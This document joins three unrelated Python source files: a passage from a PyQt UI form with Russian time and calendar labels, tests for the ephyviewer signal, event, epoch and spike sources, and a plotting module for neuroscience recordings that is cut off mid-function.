self.label_6.setObjectName(_fromUtf8("label_6"))
self.label_day_name = QtGui.QLabel(Form)
self.label_day_name.setGeometry(QtCore.QRect(50, 162, 111, 16))
self.label_day_name.setObjectName(_fromUtf8("label_day_name"))
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Time", None))
self.label.setText(_translate("Form", "Часов", None))
self.label_2.setText(_translate("Form", "Частей", None))
self.label_3.setText(_translate("Form", "Долей", None))
self.label_h.setText(_translate("Form", "0", None))
self.label_c.setText(_translate("Form", "0", None))
self.label_d.setText(_translate("Form", "0", None))
self.label_cur_time.setText(_translate("Form", "0", None))
self.label_hour_name.setText(_translate("Form", "0", None))
self.label_hour_descr.setText(_translate("Form", "0", None))
self.label_hour_descr_2.setText(_translate("Form", "Лето в круге лет", None))
self.label_hour_descr_3.setText(_translate("Form", "Лето в круге жизни", None))
self.label_hour_descr_4.setText(_translate("Form", "Лето С.М.З.Х", None))
self.label_round_years.setText(_translate("Form", "0", None))
self.label_round_life.setText(_translate("Form", "0", None))
self.label_cpsc.setText(_translate("Form", "0", None))
self.label_4.setText(_translate("Form", "Месяц", None))
self.label_month.setText(_translate("Form", "0", None))
self.label_5.setText(_translate("Form", "Число", None))
self.label_date.setText(_translate("Form", "0", None))
self.label_6.setText(_translate("Form", "День", None))
self.label_day_name.setText(_translate("Form", "-", None))
|
<gh_stars>0
import ephyviewer
import numpy as np
import os
from ephyviewer.tests.testing_tools import make_video_file
def test_InMemoryAnalogSignalSource():
signals = np.random.randn(1000000, 16)
sample_rate = 10000.
t_start = 0.
source = ephyviewer.InMemoryAnalogSignalSource(signals, sample_rate, t_start)
assert source.nb_channel==16
assert source.get_shape() == signals.shape
assert np.all(source.get_chunk(i_start=50, i_stop=55) == signals[50:55])
def test_VideoMultiFileSource():
import av
#~ video_filenames = ['video0.avi', 'video1.avi', 'video2.avi',]
video_filenames = ['video0.avi',]
for filename in video_filenames:
if not os.path.exists(filename):
make_video_file(filename)
videotimes = None
source = ephyviewer.MultiVideoFileSource(video_filenames, videotimes)
assert source.t_start==0
assert source.t_stop==10.
def test_InMemoryEventSource():
ev_times = np.arange(0, 10., .5)
ev_labels = np.array(['Event0 num {}'.format(i) for i in range(ev_times.size)], dtype='U')
event0 = { 'time':ev_times, 'label':ev_labels, 'name': 'Event0' }
ev_times = np.arange(-6, 8., 2.)
ev_labels = np.array(['Event1 num {}'.format(i) for i in range(ev_times.size)], dtype='U')
event1 = { 'time':ev_times, 'label':ev_labels, 'name': 'Event1' }
all_events = [event0, event1]
source = ephyviewer.InMemoryEventSource(all_events=all_events)
assert source.t_start==-6.
assert source.t_stop==9.5
assert source.get_size(0)==20
def test_InMemoryEpochSource():
ep_times = np.arange(0, 10., .5)
ep_durations = np.ones(ep_times.shape) * .1
ep_labels = np.array(['Epoch0 num {}'.format(i) for i in range(ep_times.size)], dtype='U')
epoch0 = { 'time':ep_times, 'duration':ep_durations,'label':ep_labels, 'name': 'Epoch0' }
ep_times = np.arange(-6, 8., 2.)
ep_durations = np.ones(ep_times.shape) * .2
ep_labels = np.array(['Epoch1 num {}'.format(i) for i in range(ep_times.size)], dtype='U')
epoch1 = { 'time':ep_times, 'duration':ep_durations, 'label':ep_labels, 'name': 'Epoch1' }
all_epochs = [epoch0, epoch1]
source = ephyviewer.InMemoryEpochSource(all_epochs=all_epochs)
assert source.t_start==-6.
assert source.t_stop==9.6
assert source.get_size(0)==20
def test_spikesource():
sike_times = np.arange(0, 10., .5)
spikes0 = { 'time':sike_times, 'name': 'Unit#0' }
sike_times = np.arange(-6, 8., 2.)
spikes1 = { 'time':sike_times, 'name': 'unit#1' }
all_spikes = [spikes0, spikes1]
source = ephyviewer.InMemorySpikeSource(all_spikes=all_spikes)
assert source.t_start==-6.
assert source.t_stop==9.5
assert source.get_size(0)==20
def test_neo_rawio_sources():
#TODO make autorun neo tdtrawio test before
from neo.rawio.tdtrawio import TdtRawIO
dirname = '/tmp/files_for_testing_neo/tdt/aep_05/'
neorawio = TdtRawIO(dirname=dirname)
neorawio.parse_header()
print(neorawio)
sources = ephyviewer.get_sources_from_neo_rawio(neorawio)
#~ print(sources)
for s in sources['signal']:
print(s.t_start, s.nb_channel, s.sample_rate)
print(s.get_chunk(i_start=0, i_stop=1024).shape)
for s in sources['epoch']:
print(s.t_start, s.nb_channel)
#~ print(s.get_chunk(i_start=0, i_stop=1024).shape)
print(s.get_chunk_by_time(chan=0, t_start=None, t_stop=None))
for s in sources['spike']:
print(s.t_start, s.nb_channel)
print(s.get_chunk_by_time(chan=0, t_start=None, t_stop=None))
#~ print(s.get_chunk(i_start=0, i_stop=1024).shape)
def test_neo_object_sources():
from neo.test.generate_datasets import generate_one_simple_segment
import neo
neo_seg = generate_one_simple_segment(supported_objects=[neo.Segment, neo.AnalogSignal, neo.Event, neo.Epoch, neo.SpikeTrain])
sources = ephyviewer.get_sources_from_neo_segment(neo_seg)
for s in sources['signal']:
print(s.t_start, s.nb_channel, s.sample_rate)
print(s.get_chunk(i_start=0, i_stop=1024).shape)
for s in sources['epoch']:
print(s.t_start, s.nb_channel)
print(s.get_chunk_by_time(chan=0, t_start=0, t_stop=10.))
for s in sources['event']:
print(s.t_start, s.nb_channel)
print(s.get_chunk_by_time(chan=0, t_start=0, t_stop=10.))
for s in sources['spike']:
print(s.t_start, s.nb_channel)
print(s.get_chunk_by_time(chan=0, t_start=0., t_stop=10.))
#~ print(s.get_chunk(i_start=0, i_stop=1024).shape)
if __name__=='__main__':
#~ test_InMemoryAnalogSignalSource()
#~ test_VideoMultiFileSource()
#~ test_InMemoryEventSource()
#~ test_InMemoryEpochSource()
#~ test_spikesource()
#~ test_neo_rawio_sources()
test_neo_object_sources()
|
<gh_stars>0
# AUTOGENERATED! DO NOT EDIT! File to edit: 04_plotting.ipynb (unless otherwise specified).
__all__ = ['DEFAULT_COLORS', 'plot_2d_sta', 'plot_cross_correlation', 'plot_2d_fit', 'plot_ds_wheel',
'plot_dark_white_response', 'plot_fl_bars', 'plot_t_sta', 'plot_chirp', 'plot_chirpam_fit',
'plot_chirp_freq_epoch_fit', 'plot_spike_template', 'plot_spike_template_MEA', 'plot_autocorrelogram',
'plot_spike_amplitudes', 'plot_cell_spatial', 'plot_calcium_trace', 'plot_stim_epochs_to_spikes',
'plot_stim_epochs_to_calcium', 'plot_stim_recap_table', 'plot_composed_A_masks', 'plot_sta_positions',
'plot_dome_flat', 'plot_dome_checker', 'configure_pyplot_recap', 'plot_recap_vivo_ephy',
'plot_recap_vivo_calcium', 'plot_recap_vitro_ephy', 'plot_recap_vivo_ephy_dome']
# Cell
import matplotlib.pyplot as plt
from matplotlib import gridspec
from matplotlib.backends.backend_pdf import PdfPages
from matplotlib.patches import Ellipse
import seaborn as sns
import pandas as pd
import numpy as np
import scipy.ndimage as ndimage
from cmath import *
from .core import *
from .processing import *
from .utils import *
from .modelling import *
from .leddome import *
DEFAULT_COLORS = plt.rcParams['axes.prop_cycle'].by_key()['color']
# Cell
def plot_2d_sta(sta, grid=None, pval=None):
sta = np.array(sta)
if len(sta.shape) == 2:
sta = [sta]
if grid is None:
# fig = plt.figure(figsize=(20,4+len(sta)//8*2))
grid = gridspec.GridSpec(len(sta)//8 + 1, 8)
for i, frame in enumerate(sta):
ax = plt.subplot(grid[i//8, i%8])
ax.imshow(frame, cmap='gray',vmin=-1, vmax=1)
else:
grid_x, grid_y = grid.get_geometry()
for i in range(grid_x):
for j in range(grid_y):
ax = plt.subplot(grid[i*grid_y+j])#fig.add_subplot(grid[i])
ax.imshow(sta[i*grid_y+j], cmap='gray',vmin=-1, vmax=1, interpolation="nearest")
if i!=grid_x-1:
ax.set_xticks([])
if j != 0:
ax.set_yticks([])
if i==0 and j==1:
if pval is None:
ax.set_title("Checkerboard")
else:
ax.set_title("Checkerboard p="+format_pval(pval))
# Cell
def plot_cross_correlation(correlation_array, threshold=.1 ,two_sided=True):
n_cell = correlation_array.shape[0]
_min,_max = np.min(correlation_array), np.max(correlation_array)
thresh = (_max-_min) * threshold
for i in range(n_cell):
for j in range(i, n_cell):
c = "#1f77b4"
if np.max(correlation_array[i,j])-np.min(correlation_array[i,j]) > thresh:
c = "red"
for k in range(2 if two_sided else 1):
if k==0:
ax = fig.add_subplot(n_cell,n_cell,i*n_cell+j+1, ylim=(_min,_max), label=str(i*n_cell+j+1))
else:
ax = fig.add_subplot(n_cell,n_cell,j*n_cell+i+1, ylim=(_min,_max), label="b"+str(i*n_cell+j+1))
plt.plot(correlation_array[i,j], c=c)
plt.axis('off')
if i == 0 and k==0:
ax.set_title(str(j))
elif i == 0 and k==1:
ax.set_title(str(j), pad =-50, loc="left")
elif i == j:
ax.set_title(str(j), pad =-50, loc="center")
# Cell
def plot_2d_fit(sta, param_d):
plt.subplot(1,2,1)
plt.imshow(sta, vmin=-1,vmax=1, cmap="gray")
plt.subplot(1,2,2)
plt.imshow(img_2d_fit(sta.shape, param_d, f=sum_of_2D_gaussian), vmin=-1,vmax=1, cmap="gray")
# Cell
def plot_ds_wheel(ax, ds_dict, cell_idx):
key_0 = list(ds_dict.keys())[0]
n_angle = ds_dict[key_0][0].shape[1]
x = np.linspace(0, (n_angle-1)/4*np.pi, num=n_angle)
linestyle = [":", "--"]
best_oi, best_di = None, None
idx_best_oi, idx_best_di = 0, 0
to_plot = []
for j, (key, data) in enumerate(ds_dict.items()):
spike_counts = data[0][cell_idx,:]
dir_pref = data[1][cell_idx]
dir_mod, dir_phase = polar(dir_pref)
dir_pval = data[5][cell_idx]
#We could aswell use the already calculated index but polar provide us an angle that can be plotted.
ori_pref = data[3][cell_idx]
ori_mod, ori_phase = polar(ori_pref)
ori_pval = data[6][cell_idx]
if best_oi is None:
best_oi, best_di = (ori_mod, ori_phase, ori_pval), (dir_mod, dir_phase, dir_pval)
else:
if best_oi[2]<ori_pval:
best_oi=(ori_mod, ori_phase, ori_pval)
idx_best_oi = j
if best_di[2]<dir_pval:
best_di=(dir_mod, dir_phase, dir_pval)
idx_best_di = j
to_plot.append((key, spike_counts, dir_mod, dir_pval, ori_mod, ori_pval))
for j, (key, spike_counts, dir_mod, dir_pval, ori_mod, ori_pval) in enumerate(to_plot):
label = key+" DI:"+str(round(dir_mod,2))+" / p"+str(round(1-dir_pval,2))
if j==idx_best_di:
label += " *"
label += " OI:"+str(round(ori_mod,2))+" / p"+str(round(1-ori_pval,2))
if j==idx_best_oi:
label += " *"
ax.plot(np.concatenate((x, x[0:1])), np.concatenate((spike_counts, spike_counts[0:1])),
linestyle=linestyle[j//2], c=DEFAULT_COLORS[j%2],
label=label)
x_uplim = ax.get_ylim()[1]
ds_arrow = ax.arrow(0,x_uplim/500,best_di[1], best_di[0]*x_uplim, width=.3, head_width=x_uplim/1000000, color='tab:purple', label="Best DI")
os_arrow = ax.arrow(0,x_uplim/500,best_oi[1], best_oi[0]*x_uplim, width=.3, head_width=x_uplim/1000000, color='tab:green', label="Best OI")
legend_obj, legend_label = ax.get_legend_handles_labels()
#For double legend box, need to add manually the artist for the first legend
first_legend = ax.legend(legend_obj, legend_label, loc=(-.1,-.16))
plt.gca().add_artist(first_legend)
ax.legend([ds_arrow, os_arrow], ["best direction index (DI)", "best orientation index (OI)"], loc=(-.1,.95), ncol=2)
# Cell
def plot_dark_white_response(ax, spike_bins):
"""spike_bins must be of shape (2, n_cell, trial_len), the dark beeing at idx 0 and white at idx 1
of the first dimension."""
for i in range(spike_bins.shape[1]):
ax.plot(spike_bins[0,i], label="dark", c="#000000")
ax.plot(spike_bins[1,i], label="white", c="#8F8F8F")
ax.set_title('Cell '+str(i))
ax.legend()
# Cell
def plot_fl_bars(ax, sta, pval=None):
time_axis = np.round(np.linspace(0,len(sta)/60,len(sta))[::-1]*(-1),3)
ax.imshow(sta, cmap='gray',vmin=-1, vmax=1, aspect="auto", interpolation="nearest")
ax.set_yticks(np.arange(0, len(sta), 1))
ax.set_yticklabels(time_axis)
if pval is None:
ax.set_title("Flickering_bars")
else:
ax.set_title("Flickering_bars p="+format_pval(pval))
# Cell
def plot_t_sta(ax, sta, pval=None):
time_axis = np.linspace(0,len(sta)/60,len(sta))[::-1]*(-1)
lns = ax.plot(time_axis,sta, label="STA norm")
ax.set_ylim(-1,1)
ax.legend()
labs = [l.get_label() for l in lns]
ax.legend(lns, labs, loc=0)
if pval is None:
ax.set_title("Fullfield_flickering")
else:
ax.set_title("Fullfield_flickering p="+format_pval(pval))
# Cell
def plot_chirp(ax, stim_inten, spike_bins, smooth=True):
#Getting the number of repeats by convolving a part of the stimulus
conv_res = np.convolve(stim_inten[360:600].astype(float), stim_inten.astype(float), mode="full")
n_repeats = np.sum(conv_res.max()==conv_res)
trace = spike_bins.reshape(n_repeats,-1)
len_ = trace.shape[1]
df = pd.DataFrame(columns=["timepoint","repeat","signal"])
for i, repeat_am in enumerate(trace):
if smooth:
repeat_am = np.convolve([.333]*3, repeat_am, mode="same")
repeat_df = pd.DataFrame(list(zip(np.linspace(0,len_/60,len_),
[str(i)]*len_,
repeat_am)), columns=["timepoint","repeat","signal"])
df = df.append(repeat_df, ignore_index=True)
g = sns.lineplot(x="timepoint", y="signal", data=df, ax=ax, n_boot=100) #Small n_boot to speed_up plotting
# (default n_boot=10000)
# trace = np.mean(trace, axis=0)
# if smooth:
# trace = np.convolve([.2]*3, trace, mode="same")
# plt.plot(np.linspace(0,len_/60,len_), trace)
min_val, max_val = ax.get_ylim()
ax.set_ylim(min_val , (max_val-min_val)*6/5)
ax.set(xlabel='', ylabel='')
ax.imshow([stim_inten.reshape(n_repeats,-1)[0]], aspect='auto', cmap="gray", extent=(0,len_/60,(max_val-min_val)*6/5,max_val))
# Cell
def plot_chirpam_fit(cell_mean, fit, start=390, stop=960):
plt.figure()
plt.plot(np.linspace(0, len(cell_mean)/60, len(cell_mean), endpoint=False), cell_mean)
plt.plot(np.linspace(start/60, stop/60, stop-start, endpoint=False), sinexp_sigm(np.linspace(0, (stop-start)/60, stop-start, endpoint=False), *fit))
def plot_chirp_freq_epoch_fit(cell_mean, fit_l, freqs=[1.875,3.75,7.5,15,30], durations=[2,2,2,1,1], start=360):
plt.figure()
plt.plot(np.linspace(0, len(cell_mean)/60, len(cell_mean), endpoint=False), cell_mean)
len_fits = [int(dur*freq)*int(60/freq) for dur,freq in zip(durations, freqs)]
cursor = start
edgecut = 10
for len_fit, dur, fit in zip(len_fits, durations, fit_l):
cursor += edgecut
len_fit -= edgecut
if fit is None:
cursor += len_fit
continue
t = np.linspace(0, len_fit/60, len_fit*4, endpoint=False)
plt.plot(t+(cursor/60), sin_exponent(t, *fit))
cursor += len_fit
# Cell
def plot_spike_template(ax, cluster_composition, templates, shanks_idx, channel_positions):
tmp = cluster_composition[0]
n_points = 30
mask_trace = np.arange(templates.shape[1]//2-10,
templates.shape[1]//2+(n_points-10))
template_pos = np.where(np.abs(templates[tmp])
== np.max(np.abs(templates[tmp])))[1][0]
template_shank = np.where(shanks_idx==template_pos)[0][0]
selected_channels = shanks_idx[template_shank]
selected_channels = selected_channels[selected_channels!=-1] #Removing the disabled channels
shank_templates = templates[:,:,selected_channels]
min_x = np.min(channel_positions[selected_channels][:,0])
for i, pos in enumerate(channel_positions[selected_channels]):
for j, cell in enumerate(cluster_composition):
color = DEFAULT_COLORS[j%len(DEFAULT_COLORS)]
ax.plot(np.arange(n_points)+pos[0]-min_x, shank_templates[cell,mask_trace,i]*4+pos[1], c=color)
ax.set_title("Shank "+str(template_shank+1))
def plot_spike_template_MEA(ax, cluster_composition, templates, channel_positions):
tmp = cluster_composition[0]
n_points = 25
mask_trace = np.arange(templates.shape[1]//2-10,
templates.shape[1]//2+(n_points-10))
template_pos = channel_positions[np.where(np.abs(templates[tmp]) == np.max(np.abs(templates[tmp])))[1][0]]
selected_channels = np.where(np.linalg.norm(channel_positions - template_pos, axis=1) < 100)[0]
for i, pos in enumerate(channel_positions[selected_channels]):
for j, cell in enumerate(cluster_composition):
color = DEFAULT_COLORS[j%len(DEFAULT_COLORS)]
ax.plot(np.arange(n_points)+pos[0], templates[cell, mask_trace,i]*4+pos[1], c=color)
ax.set_ylim(template_pos[1]-150, template_pos[1]+150)
ax.set_xlim(template_pos[0]-150, template_pos[0]+150)
ax.set_title("X/Y pos: "+str(pos[0])+"/"+str(pos[1]))
def plot_autocorrelogram(ax, cluster, spike_times, spike_clusters, bin_ms=.001, sampling_rate=30000, tails=30):
cluster_mask = spike_clusters==cluster
cluster_times = spike_times[cluster_mask]
hist = np.histogram(cluster_times, bins=np.linspace(0,cluster_times[-1], cluster_times[-1]/(bin_ms*sampling_rate)))[0]
hist_tails = np.concatenate(([0]*tails, hist, [0]*tails))
corr = np.correlate(hist_tails, hist, mode="valid")
corr[tails]=0
ax.bar(np.linspace(-tails*bin_ms*1000,tails*bin_ms*1000,tails*2+1), corr, width=bin_ms*1000)
ax.set_title("Autocorrelogram, bin="+str(bin_ms*1000)+"ms")
def plot_spike_amplitudes(ax, cluster, spike_templates, spike_clusters, spike_times, amplitudes, n_max_dots=5000):
mask_cluster = spike_clusters==cluster
clusters = np.unique(spike_templates[mask_cluster])
points_per_cluster = n_max_dots//len(clusters)
total_spikes = 0
for templ in clusters:
mask_template = spike_templates==templ
n_spike_template = np.sum(mask_template)
total_spikes+=n_spike_template
mask_selected_spikes = np.linspace(0, n_spike_template, min(n_spike_template, points_per_cluster), dtype=int, endpoint=False)
plt.scatter(spike_times[mask_template][mask_selected_spikes], amplitudes[mask_template][mask_selected_spikes], s=1)
ax.set_xticks([])
ax.set_title("Spike amplitudes - n°spike: "+str(total_spikes))
def plot_cell_spatial(ax, cell_spatial):
ax.imshow(cell_spatial)
def plot_calcium_trace(ax, cell_trace):
ax.plot(range(0,len(cell_trace),8), cell_trace[::8], linewidth=.1)
ax.set_xticks([])
ax.set_title("Calcium activity")
def plot_stim_epochs_to_spikes(ax, reM, y_pos):
pos_text_cursor = 1
seq = reM._sequences[0]
stim_names = seq.get_names_group("stim")
idx_l = []
for stim_name in stim_names:
dc = seq._data_dict[stim_name][0]
idx_l.append(dc.idx)
idx_l = np.array(idx_l)
order_stim = np.argsort(idx_l)
for stim_idx in order_stim:
stim_name = stim_names[stim_idx]
dc = seq._data_dict[stim_name][0]
len_dc = seq["main_tp"][dc.idx+len(dc)]-seq["main_tp"][dc.idx]
start_dc = seq["main_tp"][dc.idx]
ax.barh(y_pos, len_dc, left=start_dc, height=.1)
ax.text(start_dc, y_pos+(.1*pos_text_cursor), stim_name, fontdict={"size":10})
pos_text_cursor*=-1
def plot_stim_epochs_to_calcium(ax, reM, y_pos):
pos_text_cursor = 1
seq = reM._sequences[0]
stim_names = seq.get_names_group("stim")
idx_l = []
for stim_name in stim_names:
dc = seq._data_dict[stim_name][0]
idx_l.append(dc.idx)
idx_l = np.array(idx_l)
order_stim = np.argsort(idx_l)
for stim_idx in order_stim:
stim_name = stim_names[stim_idx]
dc = seq._data_dict[stim_name][0]
len_dc = len(dc)
start_dc = dc.idx
ax.barh(y_pos, width=len_dc, left=start_dc, height=.1)
ax.text(start_dc, y_pos+(.1*pos_text_cursor), stim_name, fontdict={"size":10})
pos_text_cursor*=-1
def plot_stim_recap_table(ax, df):
width_ratios = []
for col in df.columns:
width_ratios.append(max(5, len(col), max(map(len,map(str,df[col])))))
widths = [w/np.sum(width_ratios) for w in width_ratios]
ax.table(cellText=np.vstack([df.columns, df.values]),
cellColours=[['lightgray']*df.shape[1]] + [['none']*df.shape[1]]*df.shape[0],
bbox=[0,0,1,1],
colWidths=widths)
ax.axis('off')
# Cell
def plot_composed_A_masks(ax, A_matrix):
center_mass_l = []
final_img = np.ones((3,*A_matrix.shape[1:]), dtype="float")
for i, cell_A in enumerate(A_matrix):
cell_A = cell_A/np.max(cell_A)
hexa_color = DEFAULT_COLORS[i%len(DEFAULT_COLORS)]
red, green, blue = int(hexa_color[1:3], 16),int(hexa_color[3:5], 16), int(hexa_color[5:7], 16)
color = np.zeros((3,*A_matrix.shape[1:]), dtype="float")
color[0] += red/255; color[1] += green/255; color[2] += blue/255;
final_img = color*cell_A + final_img*(1-cell_A)
center_mass_l.append(ndimage.measurements.center_of_mass(cell_A))
ax.imshow(final_img.T)
for i, (x,y) in enumerate(center_mass_l):
ax.text(x,y, str(i))
def plot_sta_positions(ax, stas):
for i, sta in enumerate(stas):
color = DEFAULT_COLORS[i%len(DEFAULT_COLORS)]
best_frame = np.unravel_index(np.argmax(np.abs(sta)), sta.shape)[0]
sfit = fit_spatial_sta(sta[best_frame])
e = Ellipse(xy=[sfit["x0_1"], sta.shape[1]-sfit["z0_1"]],
width=sfit["sigma_x_1"], height=sfit["sigma_z_1"],
angle=sfit["theta_1"]*180*np.pi, fill=False)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(.9)
e.set_edgecolor(color)
ax.text(e.center[0], e.center[1], str(i), horizontalalignment="center", verticalalignment="center")
ax.set_xlim(0,sta.shape[2])
ax.set_ylim(0,sta.shape[1])
# Cell
def plot_dome_flat(ax, sph_pos=get_dome_positions(mode="spherical"), **scatter_args):
"""axis needs to be polar projection"""
if ax is None:
fig = plt.figure()
ax = fig.add_subplot(111, projection='polar')
sph_pos = np.reshape(sph_pos, (-1,3))
ax.scatter(sph_pos[:,2]+np.pi, sph_pos[:,1], **scatter_args)
ax.set_yticks(ticks=[])
ax.set_xticks(ticks=[])
ax.set_ylim(0,np.pi/2)
ax.grid(b=False)
def plot_dome_checker(sta, s=20, grid=None, pval=None):
if grid is None:
grid = gridspec.GridSpec(len(sta)//8 + 1, 8)
for i, frame in enumerate(sta):
ax = plt.subplot(grid[i//8, i%8])
plot_dome_flat(ax, s=s, c=frame, vmin=-1, vmax=1, cmap="gray")
else:
grid_x, grid_y = grid.get_geometry()
for i in range(grid_x):
for j in range(grid_y):
ax = plt.subplot(grid[i*grid_y+j], projection='polar')
plot_dome_flat(ax, s=s, c=sta[i*grid_y+j], vmin=-1, vmax=1, cmap="gray")
if i==0 and j==1:
if pval is None:
ax.set_title("Checkerboard")
else:
ax.set_title("Checkerboard p="+format_pval(pval))
# Cell
def configure_pyplot_recap(small_size=14, medium_size=18, bigger_size=24):
plt.rc('font', size=small_size) # controls default text sizes
plt.rc('axes', titlesize=small_size) # fontsize of the axes title
plt.rc('axes', labelsize=medium_size) # fontsize of the x and y labels
plt.rc('xtick', labelsize=small_size) # fontsize of the tick labels
plt.rc('ytick', labelsize=small_size) # fontsize of the tick labels
plt.rc('legend', fontsize=small_size) # legend fontsize
plt.rc('figure', titlesize=bigger_size) # fontsize of the figure title
sns.set_context("notebook", rc={"font.size":small_size,
"axes.titlesize":small_size,
"axes.labelsize":medium_size,
"xtick.labelsize":small_size,
"ytick.labelsize":small_size,
"legend.fontsize":small_size,
"figure.titlesize":bigger_size})
sns.set_style("white")
sns.set_style("ticks")
# Cell
def plot_recap_vivo_ephy(title_dict, reM, phy_dict, cluster_ids, df_stim, cell_db_ids=None,
checkerboard=None, fullfield_fl=None, fl_bars=None, chirp_am=None,
chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
"""Plot the recapitulating form of in vivo electrophy records
title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
reM -> The record master object of the record
phy_dict -> A dictionnary containing the matrix obtained from phy (see utils.phy_results_dict())
cluster_ids -> A list of the cluster id used by phy corresponding to the good cells analysed
cell_db_ids -> A list of the database ids of the cells corresponding to cluster_ids
checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
fullfield_fl -> A matrix of STA of cells to the fullfield_flicker stimulus of shape (n_cell, 16)
fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
moving_gratings -> The dict of response obtained from utils.group_direction_response
export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
"""
print("Generating the recap plot")
configure_pyplot_recap()
shanks_idx = buszaki_shank_channels(phy_dict["channel_positions"])
cond = title_dict["condition"]
date = title_dict["date"]
record_name = title_dict["record_name"]
record_id = title_dict["record_id"]
if cell_db_ids is None:
cell_db_ids = [-1]*len(cluster_ids)
with PdfPages(export_path) as pp:
#Plotting Cover
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
ax_rem = fig.add_subplot(gs[:10,2:-1])
reM.plot(ax_rem)
ax_stim_recap = fig.add_subplot(gs[11:16,:])
plot_stim_recap_table(ax_stim_recap, df_stim)
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id)])
plt.suptitle(suptitle)
pp.savefig()
plt.close()
for cluster, cell_id in zip(cluster_ids, cell_db_ids):
reM_cell_idx = reM["S_matrix"][0].attrs["cell_map"][cluster]#np.where(cluster==cluster_ids)[0][0]
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
suptitle = " - ".join([cond, date, record_name+" n°"+str(record_id),
"Cluster n°"+str(cluster), "Cell id n°"+str(cell_id)])
plt.suptitle(suptitle)
mask_cluster = phy_dict["spike_clusters"]==cluster
cluster_composition = np.unique(phy_dict["spike_templates"][mask_cluster])
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
#Template on electrodes
cell_loc_ax = fig.add_subplot(gs[0:4,0:2])
plot_spike_template(cell_loc_ax, cluster_composition, phy_dict["templates"], shanks_idx, phy_dict["channel_positions"])
#Autocorrelogram
autocorr_ax = fig.add_subplot(gs[0:4,3:7])
plot_autocorrelogram(autocorr_ax, cluster, phy_dict["spike_times"], phy_dict["spike_clusters"],
bin_ms=.001, sampling_rate=30000, tails=30)
#Spike amplitude across time
sp_amp_ax = fig.add_subplot(gs[0:4,8:])
plot_spike_amplitudes(sp_amp_ax, cluster, phy_dict["spike_templates"], phy_dict["spike_clusters"],
phy_dict["spike_times"], phy_dict["amplitudes"])
plot_stim_epochs_to_spikes(sp_amp_ax, reM, y_pos=0.6)
#Checkerboard STA
if checkerboard is not None:
pval_checker = checkerboard[1][reM_cell_idx]
pval_checker = np.min(pval_checker[pval_checker!=0])
inner_grid = gridspec.GridSpecFromSubplotSpec(4, 4,
subplot_spec=gs[5:12,0:12], wspace=.09, hspace=.13)
plot_2d_sta(checkerboard[0][reM_cell_idx], pval=pval_checker, grid=inner_grid)
#Fullfield flickering STA
if fullfield_fl is not None:
pval_fffl = fullfield_fl[1][reM_cell_idx]
pval_fffl = np.min(pval_fffl[pval_fffl!=0])
sp_amp_ax = fig.add_subplot(gs[5:12,13:])
plot_t_sta(sp_amp_ax, fullfield_fl[0][reM_cell_idx], pval=pval_fffl)
#Chirp_FM
if chirp_fm is not None:
chirpfm_ax = fig.add_subplot(gs[13:16,:])
plot_chirp(chirpfm_ax, chirp_fm[0], chirp_fm[1][:,reM_cell_idx], smooth=False)
chirpfm_ax.set_title("Chirp FM")
#Chirp_AM
if chirp_am is not None:
chirpam_ax = fig.add_subplot(gs[17:20,:])
plot_chirp(chirpam_ax, chirp_am[0], chirp_am[1][:,reM_cell_idx], smooth=False)
chirpam_ax.set_title("Chirp AM")
#Flickering bars
if fl_bars is not None:
pval_bars = fl_bars[1][reM_cell_idx]
pval_bars = np.min(pval_bars[pval_bars!=0])
fl_bars_ax = fig.add_subplot(gs[21:,:12])
plot_fl_bars(fl_bars_ax, fl_bars[0][reM_cell_idx], pval=pval_bars)
#Moving gratings
if moving_gratings is not None:
ds_ax = fig.add_subplot(gs[21:,13:], projection="polar")
plot_ds_wheel(ds_ax, moving_gratings, cell_idx=reM_cell_idx)
pp.savefig()
plt.close()
print("Cell cluster n°",cluster,"done")
sns.set()
plt.rcdefaults()
print()
# Cell
def plot_recap_vivo_calcium(title_dict, reM, A_matrix, cell_traces, df_stim, cell_indexes=None, cell_db_ids=None,
checkerboard=None, fullfield_fl=None, fl_bars=None, chirp_am=None,
chirp_fm=None, moving_gratings=None, export_path="./recap_plot.pdf"):
"""Plot the recapitulating form of in vivo electrophy records
title_dict -> A dictionnary containing the str info for the title: keys(condition, date, record_name, record_id)
reM -> The record master object of the record
A_matrix -> A matrix of the cell spatial components obtained from CaImAn
cell_indexes -> A list of the indexes of the cell to plot. Leave to None for plotting all of them.
cell_db_ids -> A list of the database ids of the cells in the order of the cells data index.
checkerboard -> A matrix of STA of cells to the checkerboard stimulus of shape (n_cell, 16, height, width)
fullfield_fl -> A matrix of STA of cells to the fullfield_flicker stimulus of shape (n_cell, 16)
fl_bars -> A matrix of STA of cells to the flickering_bars stimulus of shape (n_cell, 16, height, width)
chirp_am -> A tuple of the chirp_am obtained from a pipe, where [0] is the stimulus and [1] the cells response
chirp_fm -> Same as chirp_am but for a chirp_fm stimulus
moving_gratings -> The dict of response obtained from utils.group_direction_response
export_path -> The path for a pdf file to be exported. If None, the plot is displayed.
"""
print("Generating the recap plot")
configure_pyplot_recap()
cond = title_dict["condition"]
date = title_dict["date"]
record_name = title_dict["record_name"]
record_id = title_dict["record_id"]
if cell_indexes is None:
cell_indexes = list(range(len(A_matrix)))
if cell_db_ids is None:
cell_db_ids = [-1]*len(cell_indexes)
with PdfPages(export_path) as pp:
#Plotting Cover
fig = plt.figure(figsize=(8.267717*2,11.69291*2)) #A4 values in inches *2
gs = gridspec.GridSpec(28, 20, left=0.05, right=.95, top=.92, bottom=.05, wspace=0.00, hspace=0.00)
ax_rem = fig.add_subplot(gs[:10,2:-1])
reM.plot(ax_rem)
